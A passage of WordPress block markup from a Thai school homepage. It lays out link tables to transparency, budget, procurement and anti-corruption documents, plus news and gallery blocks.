{\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม  No Gift Policy</a></strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- 